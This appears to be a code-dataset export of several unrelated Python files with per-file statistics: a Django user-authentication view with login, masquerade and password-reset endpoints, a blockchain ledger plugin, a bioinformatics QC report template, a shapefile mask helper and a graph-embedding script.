                self._state = STATE_ALARM_ARMED_AWAY
        except:
            pass

        self.schedule_update_ha_state(True)

    @property
    def changed_by(self):
        """Last change triggered by."""
        return None

    @property
    def code_arm_required(self):
        """Whether the code is required for arm actions."""
        return True

    @property
    def state(self):
        """Get the state of the device."""
        return self._state
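
# --- Illustrative note (hypothetical payload; not from the source): Home
# Assistant would call setup_platform once per discovered panel with a device
# dict carrying the constants used above, e.g.:
#
# device = {DEVICE_ALARM_MODE: "none", DEVICE_TAMPER_STATUS: "ok",
#           DEVICE_ZID: "abc123", DEVICE_SOURCE: "hub.redsky"}
# setup_platform(hass, config, add_devices, device)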
| 31.288136 | 93 | 0.54117 | 357 | 3,692 | 5.305322 | 0.243697 | 0.095037 | 0.110876 | 0.06019 | 0.504752 | 0.472545 | 0.467793 | 0.424498 | 0.420275 | 0.404435 | 0 | 0 | 0.377302 | 3,692 | 117 | 94 | 31.555556 | 0.823836 | 0.056609 | 0 | 0.538462 | 0 | 0 | 0.040846 | 0.022596 | 0 | 0 | 0 | 0 | 0 | 1 | 0.10989 | false | 0.153846 | 0.087912 | 0 | 0.241758 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
4961cb44515f6694bce4182b84680ae488d272d1 | 14,882 | py | Python | binder/plugins/views/userview.py | asma-oueslati/django-binder | 0a16a928664b4be2b2b8e3f5f65c29301f0096fe | [
"MIT"
] | null | null | null | binder/plugins/views/userview.py | asma-oueslati/django-binder | 0a16a928664b4be2b2b8e3f5f65c29301f0096fe | [
"MIT"
] | null | null | null | binder/plugins/views/userview.py | asma-oueslati/django-binder | 0a16a928664b4be2b2b8e3f5f65c29301f0096fe | [
"MIT"
] | null | null | null | import logging
import json

from abc import ABCMeta, abstractmethod

from django.contrib import auth
from django.contrib.auth import update_session_auth_hash, password_validation
from django.contrib.auth.tokens import default_token_generator
from django.core.exceptions import ValidationError, PermissionDenied
from django.http import HttpResponse
from django.utils.decorators import method_decorator
from django.views.decorators.debug import sensitive_post_parameters
from django.views.decorators.cache import never_cache
from django.utils.translation import ugettext as _

from binder.permissions.views import no_scoping_required
from binder.exceptions import BinderForbidden, BinderReadOnlyFieldError, BinderMethodNotAllowed, BinderIsNotDeleted, \
    BinderIsDeleted, BinderNotAuthenticated, BinderFieldTypeError, BinderRequestError, BinderValidationError, \
    BinderNotFound
from binder.router import list_route, detail_route
from binder.json import JsonResponse
from binder.views import annotate

logger = logging.getLogger(__name__)


class UserBaseMixin:
    __metaclass__ = ABCMeta

    def respond_with_user(self, request, user_id):
        return JsonResponse(
            self._get_objs(
                annotate(self.get_queryset(request).filter(pk=user_id), request),
                request=request,
            )[0]
        )


class MasqueradeMixin(UserBaseMixin):
    __metaclass__ = ABCMeta

    @detail_route(name='masquerade')
    @no_scoping_required()
    def masquerade(self, request, pk=None):
        from hijack.helpers import login_user

        if request.method != 'POST':
            raise BinderMethodNotAllowed()

        try:
            user = self.model._default_manager.get(pk=pk)
        except self.model.DoesNotExist:
            raise BinderNotFound()

        self._require_model_perm('masquerade', request)
        login_user(request, user)  # Ignore returned redirect response object
        return self.respond_with_user(request, user.id)

    @list_route(name='endmasquerade')
    @no_scoping_required()
    def endmasquerade(self, request):
        from hijack.helpers import release_hijack

        if request.method != 'POST':
            raise BinderMethodNotAllowed()

        self._require_model_perm('unmasquerade', request)
        release_hijack(request)  # Ignore returned redirect response object
        return self.respond_with_user(request, request.user.id)

    def _logout(self, request):
        from hijack.helpers import release_hijack

        # Release masquerade on logout if masquerading
        try:
            release_hijack(request)
        except PermissionDenied:  # Means we are not hijacked
            super()._logout(request)
class UserViewMixIn(UserBaseMixin):
    __metaclass__ = ABCMeta

    log_request_body = False
    token_generator = default_token_generator
    default_authentication_backend = None

    def _require_model_perm(self, perm_type, request, pk=None):
        """
        Overwrite _require_model_perm to make sure that a non-superuser can not modify a superuser.

        We need to be very careful about permission assumptions after this point.
        """
        # If the user is trying to change a superuser and is not a superuser, disallow
        if pk and self.model.objects.get(pk=int(pk)).is_superuser and not request.user.is_superuser:
            # Maybe BinderRequestError?
            raise BinderForbidden('modify superuser', request.user)

        # Everything normal
        return super()._require_model_perm(perm_type, request, pk)

    def _store__groups(self, obj, field, value, request, pk=None):
        """
        Store the groups of the user.

        If we get here, the user might not actually have admin permissions;
        if the user does not have user change perms, disallow setting groups.
        """
        try:
            self._require_model_perm('changegroups', request)
            return self._store_field(obj, field, value, request, pk=pk)
        except BinderForbidden:  # convert to read-only error, so the field is ignored
            raise BinderReadOnlyFieldError(self.model.__name__, field)

    def authenticate(self, request, **kwargs):
        return auth.authenticate(request, **kwargs)

    def auth_login(self, request, user, backend=None):
        return auth.login(request, user, backend=(
            backend or
            getattr(user, 'backend', None) or
            self.default_authentication_backend
        ))

    @method_decorator(sensitive_post_parameters())
    @list_route(name='login', unauthenticated=True)
    @no_scoping_required()
    def login(self, request):
        """
        Login the user.

        Request:
            POST user/login/
            {
                "username": "foo",
                "password": "password"
            }

        Response:
            returns the same parameters as GET user/{id}/
        """
        if request.method != 'POST':
            raise BinderMethodNotAllowed()

        try:
            decoded = request.body.decode()
            body = json.loads(decoded)
            username = body.get(self.model.USERNAME_FIELD, '')
            password = body.get('password', '')
        except Exception:
            username = request.POST.get(self.model.USERNAME_FIELD, '')
            password = request.POST.get('password', '')

        user = self.authenticate(request, **{
            self.model.USERNAME_FIELD: username.lower(),
            'password': password,
        })

        self._require_model_perm('login', request)

        if user is None:
            logger.info('login failed for "{}"'.format(username))
            raise BinderNotAuthenticated()
        else:
            self.auth_login(request, user)
            logger.info('login for {}/{}'.format(user.id, user))

        return self.respond_with_user(request, user.id)
    def _logout(self, request):
        auth.logout(request)

    @list_route(name='logout')
    @no_scoping_required()
    def logout(self, request):
        """
        Logout the user.

        Request:
            POST /user/logout/
            {}

        Response:
            204
            {}
        """
        if request.method != 'POST':
            raise BinderMethodNotAllowed()

        self._require_model_perm('logout', request)
        logger.info('logout for {}/{}'.format(request.user.id, request.user))
        self._logout(request)
        return HttpResponse(status=204)

    def get_users(self, request, username):
        """
        Given a username, return matching user(s) who should receive a reset.

        This allows subclasses to more easily customize the default policies
        that prevent inactive users and users with unusable passwords from
        resetting their password.

        Copied from django.contrib.auth.forms.PasswordResetForm
        """
        active_users = self.model._default_manager.filter(**{
            self.model.USERNAME_FIELD + '__iexact': username,
            'is_active': True,
        })
        return (u for u in active_users if u.has_usable_password())

    def _store__username(self, user, field, value, request, pk=None):
        """
        Makes sure the username is always stored as lowercase.
        """
        if not isinstance(value, str):
            raise BinderFieldTypeError(self.model.__name__, field)
        return self._store_field(user, field, value.lower(), request, pk=pk)

    def filter_deleted(self, queryset, pk, deleted, request=None):
        """
        Can be used to filter out deleted users, or to show only them.
        """
        if pk or deleted == 'true':
            return queryset

        if deleted is None:
            return queryset.filter(is_active=True)

        if deleted == 'only':
            return queryset.filter(is_active=False)

        raise BinderRequestError(_('Invalid value: deleted=%s.') % request.GET.get('deleted'))

    def soft_delete(self, user, undelete=False, request=None):
        """
        Allows the user to be soft deleted, and undeleted. What actually needs
        to be done on soft deletion can be implemented in _after_soft_delete.
        """
        try:
            if not user.is_active and not undelete:
                raise BinderIsDeleted()
            if user.is_active and undelete:
                raise BinderIsNotDeleted()
        except AttributeError:
            raise BinderMethodNotAllowed()

        user.is_active = undelete
        user.save()

        self._after_soft_delete(request, user, undelete)
    @list_route(name='reset_request', unauthenticated=True)
    @no_scoping_required()
    def reset_request(self, request):
        """
        Adds an endpoint to do a reset request. Generates a token, and calls
        the _send_reset_mail callback if the reset request is successful.

        Request:
            POST user/reset_request/
            {
                'username': 'foo'
            }

        Response:
            204
            {
            }
        """
        if request.method != 'POST':
            raise BinderMethodNotAllowed()

        self._require_model_perm('reset_password', request)

        decoded = request.body.decode()
        try:
            body = json.loads(decoded)
        except ValueError:
            raise BinderRequestError(_('Invalid request body: not a JSON document.'))

        logger.info('password reset attempt for {}'.format(body.get(self.model.USERNAME_FIELD, '')))

        for user in self.get_users(request, body.get(self.model.USERNAME_FIELD, '').lower()):
            token = self.token_generator.make_token(user)
            self._send_reset_mail(request, user, token)

        return HttpResponse(status=204)
    @never_cache
    @list_route(name='send_activation_email', unauthenticated=True)
    @no_scoping_required()
    def send_activation_email(self, request):
        """
        Endpoint that can be used to send an activation mail for a user.
        Calls the _send_activation_email callback if the user is successfully
        activated.

        Request:
            POST
            {
                "email": "email"
            }

        Response:
            {
                "code": code
            }

        Possible codes:
            sent             Mail is sent successfully
            already active   User is already active, no mail was sent
            blacklisted      User was not activated
        """
        if request.method != 'PUT':
            raise BinderMethodNotAllowed()

        # For lack of a better check
        self._require_model_perm('reset_password', request)

        decoded = request.body.decode()
        try:
            body = json.loads(decoded)
        except ValueError:
            raise BinderRequestError(_('Invalid request body: not a JSON document.'))

        logger.info('activation email attempt for {}'.format(body.get('email', '')))

        if body.get('email') is None:
            raise BinderValidationError({'email': ['missing']})

        try:
            user = self.model._default_manager.get(email=body.get('email'))
        except self.model.DoesNotExist:
            raise BinderNotFound()

        if user.is_active:
            if user.last_login is None:
                # TODO: Figure out a way to make this customisable without
                # allowing injection of arbitrary URLs (phishing!)
                self._send_activation_email(request, user)
                response = JsonResponse({'code': 'sent'})
                response.status_code = 201
            else:
                response = JsonResponse({'code': 'already active'})
        else:
            response = JsonResponse({'code': 'blacklisted'})
            response.status_code = 400

        return response
    @method_decorator(sensitive_post_parameters())
    @never_cache
    @detail_route(name='activate', unauthenticated=True)
    @no_scoping_required()
    def activate(self, request, pk=None):
        """
        Adds an endpoint to activate a user. Also logs in the user.

        Request:
            PUT user/{id}/activate/
            {
                "activation_code": string
            }

        Response:
            Same as GET user/{id}/
        """
        if request.method != 'PUT':
            raise BinderMethodNotAllowed()

        self._require_model_perm('activate', request)

        decoded = request.body.decode()
        try:
            body = json.loads(decoded)
        except ValueError:
            raise BinderRequestError(_('Invalid request body: not a JSON document.'))

        errors = {}
        for item in ['activation_code']:
            if body.get(item) is None:
                errors[item] = ['missing']
        if len(errors) != 0:
            raise BinderValidationError(errors)

        try:
            user = self.model._default_manager.get(pk=pk)
        except (TypeError, ValueError, OverflowError, self.model.DoesNotExist):
            user = None

        if user is None or not self.token_generator.check_token(user, body.get('activation_code')):
            raise BinderNotFound()

        logger.info('login for {}/{} via successful activation'.format(user.id, user))
        user.is_active = True
        user.save()

        self.auth_login(request, user)

        return self.respond_with_user(request, user.id)
    @method_decorator(sensitive_post_parameters())
    @never_cache
    @detail_route(name='reset_password', unauthenticated=True, methods=['PUT'])
    @no_scoping_required()
    def reset_password(self, request, pk=None):
        """
        Resets the password from a reset code.

        Request:
            POST user/reset_password/
            {
                "reset_code": str,
                "password": str
            }

        Response:
            Same as GET user/{id}/
        """
        self._require_model_perm('reset_password', request)

        decoded = request.body.decode()
        try:
            body = json.loads(decoded)
        except ValueError:
            raise BinderRequestError(_('Invalid request body: not a JSON document.'))

        errors = {item: 'missing' for item in ['reset_code', 'password'] if item not in body}
        if errors:
            raise BinderValidationError(errors)

        return self._reset_pass_for_user(request, int(pk), body['reset_code'], body['password'])

    def _reset_pass_for_user(self, request, user_id, token, password):
        """
        Helper function that actually resets the password for a user.
        """
        try:
            user = self.model._default_manager.get(pk=user_id)
        except (TypeError, ValueError, OverflowError, self.model.DoesNotExist):
            user = None

        if user is None or not self.token_generator.check_token(user, token):
            raise BinderNotFound()

        logger.info('login for {}/{} via successful password reset'.format(user.id, user))

        try:
            password_validation.validate_password(password, user)
        except ValidationError as ve:
            raise BinderValidationError({'password': ve.messages})

        user.set_password(password)
        user.save()

        self.auth_login(request, user)

        return self.respond_with_user(request, user.id)
    @method_decorator(sensitive_post_parameters())
    @never_cache
    @list_route(name='change_password')
    @no_scoping_required()
    def change_password(self, request):
        """
        Change the password from an old password.

        Request:
            POST user/change_password/
            {
                "old_password": str,
                "new_password": str
            }

        Response:
            Same as GET user/{id}/
        """
        if request.method != 'PUT':
            raise BinderMethodNotAllowed()

        self._require_model_perm('change_own_password', request)

        decoded = request.body.decode()
        try:
            body = json.loads(decoded)
        except ValueError:
            raise BinderRequestError(_('Invalid request body: not a JSON document.'))

        user = request.user

        errors = {}
        for item in ['old_password', 'new_password']:
            if body.get(item) is None:
                errors[item] = ['missing']
        if not user.check_password(body.get('old_password')):
            errors['old_password'] = ['incorrect']
        if len(errors) != 0:
            raise BinderValidationError(errors)

        password = body.get('new_password')
        try:
            password_validation.validate_password(password, user)
        except ValidationError as ve:
            validation_errors = {'new_password': ve.messages}
            raise BinderValidationError(validation_errors)

        user.set_password(password)
        user.save()
        logger.info('password changed for {}/{}'.format(user.id, user))

        if user == request.user:
            # Only our own session needs rehashing after a password change
            update_session_auth_hash(request, user)

        return self.respond_with_user(request, user.id)

    @abstractmethod
    def _after_soft_delete(self, request, user, undelete):
        """
        Callback called after a user is soft-deleted or soft-undeleted.
        """
        pass

    @abstractmethod
    def _send_reset_mail(self, request, user, token):
        """
        Callback to send the actual reset mail using the token.
        """
        pass

    @abstractmethod
    def _send_activation_email(self, request, user):
        """
        Callback to send a mail notifying that the user is activated.
        """
        pass
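
# --- Illustrative subclass sketch (an assumption about how the mixin is
# wired up; the view base class and mailer below are hypothetical):
#
# class UserView(UserViewMixIn, ModelView):
#     model = User
#
#     def _after_soft_delete(self, request, user, undelete):
#         pass                           # e.g. audit logging
#
#     def _send_reset_mail(self, request, user, token):
#         send_mail(user.email, 'reset', 'link built from user.id and token')
#
#     def _send_activation_email(self, request, user):
#         send_mail(user.email, 'activate', 'welcome')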
| 27.009074 | 118 | 0.73216 | 1,909 | 14,882 | 5.546883 | 0.167627 | 0.028048 | 0.019643 | 0.018888 | 0.354708 | 0.312211 | 0.26197 | 0.236755 | 0.210313 | 0.206346 | 0 | 0.001681 | 0.160731 | 14,882 | 550 | 119 | 27.058182 | 0.846117 | 0.197621 | 0 | 0.459732 | 0 | 0 | 0.088969 | 0.001807 | 0 | 0 | 0 | 0.001818 | 0 | 1 | 0.080537 | false | 0.107383 | 0.067114 | 0.010067 | 0.244966 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
49633e3a1fe78865b9e181ac00df94f57d6194b3 | 3,303 | py | Python | plenum/test/plugin/demo_plugin/main.py | SchwiftyRick/indy-plenum | d23b99423eb805971e50446d7e89ada892aa6811 | [
"Apache-2.0"
] | null | null | null | plenum/test/plugin/demo_plugin/main.py | SchwiftyRick/indy-plenum | d23b99423eb805971e50446d7e89ada892aa6811 | [
"Apache-2.0"
] | 1 | 2021-07-14T17:10:04.000Z | 2021-07-14T17:10:04.000Z | plenum/test/plugin/demo_plugin/main.py | SchwiftyRick/indy-plenum | d23b99423eb805971e50446d7e89ada892aa6811 | [
"Apache-2.0"
] | 2 | 2021-02-19T15:36:50.000Z | 2021-07-20T11:37:54.000Z | from plenum.common.constants import DOMAIN_LEDGER_ID
from plenum.server.client_authn import CoreAuthNr
from plenum.test.plugin.demo_plugin import AUCTION_LEDGER_ID
from plenum.test.plugin.demo_plugin.batch_handlers.auction_batch_handler import AuctionBatchHandler
from plenum.test.plugin.demo_plugin.config import get_config
from plenum.test.plugin.demo_plugin.request_handlers.auction_end_handler import AuctionEndHandler
from plenum.test.plugin.demo_plugin.request_handlers.auction_start_handler import AuctionStartHandler
from plenum.test.plugin.demo_plugin.request_handlers.get_bal_handler import GetBalHandler
from plenum.test.plugin.demo_plugin.request_handlers.place_bid_handler import PlaceBidHandler
from plenum.test.plugin.demo_plugin.storage import get_auction_hash_store, \
    get_auction_ledger, get_auction_state


def integrate_plugin_in_node(node):
    node.config = get_config(node.config)
    hash_store = get_auction_hash_store(node.dataLocation)
    ledger = get_auction_ledger(node.dataLocation,
                                node.config.auctionTransactionsFile,
                                hash_store, node.config)
    state = get_auction_state(node.dataLocation,
                              node.config.auctionStateDbName,
                              node.config)
    if AUCTION_LEDGER_ID not in node.ledger_ids:
        node.ledger_ids.append(AUCTION_LEDGER_ID)
    node.ledgerManager.addLedger(AUCTION_LEDGER_ID,
                                 ledger,
                                 postTxnAddedToLedgerClbk=node.postTxnFromCatchupAddedToLedger)
    node.on_new_ledger_added(AUCTION_LEDGER_ID)
    node.register_state(AUCTION_LEDGER_ID, state)

    auctions = {}

    node.write_manager.register_req_handler(AuctionStartHandler(node.db_manager, auctions))
    node.write_manager.register_req_handler(AuctionEndHandler(node.db_manager, auctions))
    node.write_manager.register_req_handler(PlaceBidHandler(node.db_manager, auctions))
    node.read_manager.register_req_handler(GetBalHandler(node.db_manager))
    # FIXME: find a generic way of registering DBs
    node.db_manager.register_new_database(lid=AUCTION_LEDGER_ID,
                                          ledger=ledger,
                                          state=state)
    node.write_manager.register_batch_handler(AuctionBatchHandler(node.db_manager),
                                              ledger_id=AUCTION_LEDGER_ID,
                                              add_to_begin=True)
    node.write_manager.register_batch_handler(node.write_manager.node_reg_handler,
                                              ledger_id=AUCTION_LEDGER_ID)
    node.write_manager.register_batch_handler(node.write_manager.primary_reg_handler,
                                              ledger_id=AUCTION_LEDGER_ID)
    node.write_manager.register_batch_handler(node.write_manager.audit_b_handler,
                                              ledger_id=AUCTION_LEDGER_ID)

    auction_authnr = CoreAuthNr(node.write_manager.txn_types,
                                node.read_manager.txn_types,
                                node.action_manager.txn_types,
                                node.states[DOMAIN_LEDGER_ID])
    node.clientAuthNr.register_authenticator(auction_authnr)
    return node
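
# --- Illustrative usage sketch (an assumption about the test setup; the
# fixture name below is hypothetical):
#
# for n in txnPoolNodeSet:            # pool of running test nodes
#     integrate_plugin_in_node(n)     # each node gains the auction ledger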
| 58.982143 | 101 | 0.693612 | 370 | 3,303 | 5.832432 | 0.235135 | 0.063021 | 0.07646 | 0.074143 | 0.37164 | 0.349398 | 0.263207 | 0.243744 | 0.202039 | 0.12975 | 0 | 0 | 0.247654 | 3,303 | 55 | 102 | 60.054545 | 0.86841 | 0.013321 | 0 | 0.06 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.018182 | 0 | 1 | 0.02 | false | 0 | 0.2 | 0 | 0.24 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
496648c5898f258ebf19c8b06ad31502f0290680 | 5,213 | py | Python | biobakery_workflows/document_templates/quality_control_paired_dna_rna.template.py | shbrief/biobakery_workflows | 2037f45caa8e4af9a40b5c1d2886cde15bc00381 | [
"MIT"
] | 1 | 2020-11-16T20:04:15.000Z | 2020-11-16T20:04:15.000Z | biobakery_workflows/document_templates/quality_control_paired_dna_rna.template.py | mlwright97/biobakery_workflows | b3e74f25253d7354bebd02936ac25986281e85d6 | [
"MIT"
] | null | null | null | biobakery_workflows/document_templates/quality_control_paired_dna_rna.template.py | mlwright97/biobakery_workflows | b3e74f25253d7354bebd02936ac25986281e85d6 | [
"MIT"
] | null | null | null |
#+ echo=False
import numpy

from biobakery_workflows import utilities, visualizations, files

from anadama2 import PweaveDocument

document = PweaveDocument()

# get the variables for this document generation task
vars = document.get_vars()

# determine the document format
pdf_format = True if vars["format"] == "pdf" else False

# read in the DNA samples
(dna_paired_columns, dna_orphan_columns), dna_samples, (dna_paired_data, dna_orphan_data) = visualizations.qc_read_counts(document, vars["dna_read_counts"])

# read in the RNA samples
(rna_paired_columns, rna_orphan_columns), rna_samples, (rna_paired_data, rna_orphan_data) = visualizations.qc_read_counts(document, vars["rna_read_counts"])

#' # Quality Control

#' <% visualizations.ShotGun.print_qc_intro_caption("{} DNA and {} RNA ".format(len(dna_samples),len(rna_samples)), rna_paired_columns[2:], paired=True) %>

#+ echo=False

#' ## DNA Samples Quality Control

#' ### DNA Samples Tables of Filtered Reads

#+ echo=False
document.write_table(["# Sample"]+dna_paired_columns, dna_samples, dna_paired_data,
    files.ShotGunVis.path("qc_counts_paired",document.data_folder))

table_message=visualizations.show_table_max_rows(document, dna_paired_data, dna_samples,
    dna_paired_columns, "DNA Paired end reads", files.ShotGunVis.path("qc_counts_paired"),
    format_data_comma=True)

#' <%= table_message %>

#+ echo=False
document.write_table(["# Sample"]+dna_orphan_columns, dna_samples, dna_orphan_data,
    files.ShotGunVis.path("qc_counts_orphan",document.data_folder))

table_message=visualizations.show_table_max_rows(document, dna_orphan_data, dna_samples,
    dna_orphan_columns, "DNA Orphan reads", files.ShotGunVis.path("qc_counts_orphan"),
    format_data_comma=True)

#' <%= table_message %>

#' <% if pdf_format: print("\clearpage") %>

#+ echo=False
# plot the microbial reads ratios
dna_microbial_reads, dna_microbial_labels = utilities.microbial_read_proportion_multiple_databases(
    dna_paired_data, dna_paired_columns, dna_orphan_data)

document.write_table(["# Sample"]+dna_microbial_labels, dna_samples,
    dna_microbial_reads, files.ShotGunVis.path("microbial_counts",document.data_folder))

table_message=visualizations.show_table_max_rows(document, dna_microbial_reads, dna_samples,
    dna_microbial_labels, "DNA microbial read proportion",
    files.ShotGunVis.path("microbial_counts"))

#' <%= visualizations.ShotGun.captions["microbial_ratios"] %>

#' <%= table_message %>

#' ### DNA Samples Plots of Filtered Reads

#+ echo=False
document.plot_grouped_barchart(numpy.transpose(dna_paired_data), row_labels=dna_paired_columns,
    column_labels=dna_samples, title="DNA Paired end reads", ylabel="Read count (in millions)",
    legend_title="Filter", yaxis_in_millions=True)

#+ echo=False
document.plot_grouped_barchart(numpy.transpose(dna_orphan_data), row_labels=dna_orphan_columns,
    column_labels=dna_samples, title="DNA Orphan reads", ylabel="Read count (in millions)",
    legend_title="Filter", yaxis_in_millions=True)

#' ## RNA Samples Quality Control

#' ### RNA Samples Tables of Filtered Reads

#+ echo=False
document.write_table(["# Sample"]+rna_paired_columns, rna_samples, rna_paired_data,
    files.ShotGunVis.path("rna_qc_counts_paired",document.data_folder))

table_message=visualizations.show_table_max_rows(document, rna_paired_data, rna_samples,
    rna_paired_columns, "RNA Paired end reads", files.ShotGunVis.path("rna_qc_counts_paired"),
    format_data_comma=True)

#' <%= table_message %>

#+ echo=False
document.write_table(["# Sample"]+rna_orphan_columns, rna_samples, rna_orphan_data,
    files.ShotGunVis.path("rna_qc_counts_orphan",document.data_folder))

table_message=visualizations.show_table_max_rows(document, rna_orphan_data, rna_samples,
    rna_orphan_columns, "RNA Orphan reads", files.ShotGunVis.path("rna_qc_counts_orphan"),
    format_data_comma=True)

#' <%= table_message %>

#' <% if pdf_format: print("\clearpage") %>

#+ echo=False
# write and plot the microbial reads ratios
rna_microbial_reads, rna_microbial_labels = utilities.microbial_read_proportion_multiple_databases(
    rna_paired_data, rna_paired_columns, rna_orphan_data)

document.write_table(["# Sample"]+rna_microbial_labels, rna_samples,
    rna_microbial_reads, files.ShotGunVis.path("rna_microbial_counts",document.data_folder))

table_message=visualizations.show_table_max_rows(document, rna_microbial_reads, rna_samples,
    rna_microbial_labels, "RNA microbial read proportion",
    files.ShotGunVis.path("rna_microbial_counts"))

#' <%= visualizations.ShotGun.captions["microbial_ratios"] %>

#' <%= table_message %>

#' ### RNA Samples Plots of Filtered Reads

#+ echo=False
document.plot_grouped_barchart(numpy.transpose(rna_paired_data), row_labels=rna_paired_columns,
    column_labels=rna_samples, title="RNA Paired end reads", ylabel="Read count (in millions)",
    legend_title="Filter", yaxis_in_millions=True)

#+ echo=False
document.plot_grouped_barchart(numpy.transpose(rna_orphan_data), row_labels=rna_orphan_columns,
    column_labels=rna_samples, title="RNA Orphan reads", ylabel="Read count (in millions)",
    legend_title="Filter", yaxis_in_millions=True)
| 38.330882 | 156 | 0.782851 | 698 | 5,213 | 5.485673 | 0.121777 | 0.036563 | 0.059546 | 0.037608 | 0.761557 | 0.710629 | 0.558893 | 0.489423 | 0.430922 | 0.390703 | 0 | 0.000428 | 0.103012 | 5,213 | 135 | 157 | 38.614815 | 0.818435 | 0.206407 | 0 | 0.148148 | 0 | 0 | 0.153111 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.055556 | 0 | 0.055556 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
49665a0b0e4dd98e4c598bd1960650361ca30dc7 | 1,604 | py | Python | Other_notebooks/Shapefile_Demo.py | gamedaygeorge/datacube-applications-library | 1b6314ee3465f9f17930391a4c241e981a9e200e | [
"Apache-2.0"
] | null | null | null | Other_notebooks/Shapefile_Demo.py | gamedaygeorge/datacube-applications-library | 1b6314ee3465f9f17930391a4c241e981a9e200e | [
"Apache-2.0"
] | null | null | null | Other_notebooks/Shapefile_Demo.py | gamedaygeorge/datacube-applications-library | 1b6314ee3465f9f17930391a4c241e981a9e200e | [
"Apache-2.0"
] | 1 | 2021-02-25T14:19:05.000Z | 2021-02-25T14:19:05.000Z | # Code behind module for Shapefile_Demo.ipynb
################################
##
## Import Statements
##
################################
# Import standard Python modules
import sys
import datacube
import numpy as np
import fiona
import xarray as xr
from rasterio.features import geometry_mask
import shapely
from shapely.ops import transform
from shapely.geometry import shape
from functools import partial
import pyproj

################################
##
## Function Definitions
##
################################


def shapefile_mask(dataset: xr.Dataset, shapefile) -> np.array:
    """Extracts a mask from a shapefile using dataset latitude and longitude extents.

    Args:
        dataset (xarray.Dataset): The dataset with the latitude and longitude extents.
        shapefile (string): The shapefile to be used for extraction.

    Returns:
        A boolean mask array.
    """
    with fiona.open(shapefile, 'r') as source:
        collection = list(source)
        geometries = []
        for feature in collection:
            geom = shape(feature['geometry'])
            project = partial(
                pyproj.transform,
                pyproj.Proj(init=source.crs['init']),  # source crs
                pyproj.Proj(init='epsg:4326'))         # destination crs
            geom = transform(project, geom)            # apply projection
            geometries.append(geom)
    geobox = dataset.geobox
    mask = geometry_mask(
        geometries,
        out_shape=geobox.shape,
        transform=geobox.affine,
        all_touched=True,
        invert=True)
return mask | 28.642857 | 86 | 0.596633 | 168 | 1,604 | 5.660714 | 0.482143 | 0.025237 | 0.042061 | 0.056782 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003336 | 0.252494 | 1,604 | 56 | 87 | 28.642857 | 0.789825 | 0.266209 | 0 | 0 | 0 | 0 | 0.021934 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.032258 | false | 0 | 0.354839 | 0 | 0.419355 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
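# --- Illustrative usage sketch (hypothetical product and extents; needs a
# configured Open Data Cube installation):
#
# import datacube
# dc = datacube.Datacube()
# ds = dc.load(product='ls8_usgs_sr_scene',
#              latitude=(-35.3, -35.2), longitude=(149.0, 149.1))
# mask = shapefile_mask(ds, 'area_of_interest.shp')
# ds_masked = ds.where(mask)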
4968c48330c18edd322258fb79f85333f213b40b | 2,306 | py | Python | process/1_embed_keep_ge.py | omarmaddouri/GCNCC_1 | ec858bbe8246e4af15f7b870ca0ccafdea93d627 | [
"MIT"
] | 4 | 2020-12-03T11:57:15.000Z | 2021-12-09T05:20:44.000Z | process/1_embed_keep_ge.py | alkaidone/GCNCC | 3270b4c2d48e0090a18a0ab1df3b9fd81627029d | [
"MIT"
] | 5 | 2020-01-28T23:14:40.000Z | 2021-08-25T15:55:23.000Z | process/1_embed_keep_ge.py | alkaidone/GCNCC | 3270b4c2d48e0090a18a0ab1df3b9fd81627029d | [
"MIT"
] | 3 | 2021-11-23T05:13:27.000Z | 2021-12-30T08:12:48.000Z | from __future__ import division
from __future__ import print_function

from pathlib import Path
import sys
project_path = Path(__file__).resolve().parents[1]
sys.path.append(str(project_path))

from keras.layers import Dense, Activation, Dropout
from keras.models import Model, Sequential
from keras.regularizers import l2
from keras.optimizers import Adam
import keras.backend as K
import numpy as np
import time
import tensorflow as tf
import os
from core.utils import *
from core.layers.graph_cnn_layer import GraphCNN
from sklearn.preprocessing import normalize

# Set random seed
seed = 123
np.random.seed(seed)
tf.random.set_seed(seed)

# Settings
flags = tf.compat.v1.flags
FLAGS = flags.FLAGS
flags.DEFINE_string('dataset', 'brc_microarray_usa', 'Dataset string.')
flags.DEFINE_string('embedding_method', 'ge', 'Name of the embedding method.')

# Check dataset availability
if not os.path.isdir("{}/data/parsed_input/{}".format(project_path, FLAGS.dataset)):
    sys.exit("{} dataset is not available under data/parsed_input/".format(FLAGS.dataset))

if not os.path.isdir("{}/data/output/{}/embedding/{}".format(project_path, FLAGS.dataset, FLAGS.embedding_method)):
    os.makedirs("{}/data/output/{}/embedding/{}".format(project_path, FLAGS.dataset, FLAGS.embedding_method))

print("--------------------------------------------")
print("--------------------------------------------")
print("Hyper-parameters:")
print("Dataset: {}".format(FLAGS.dataset))
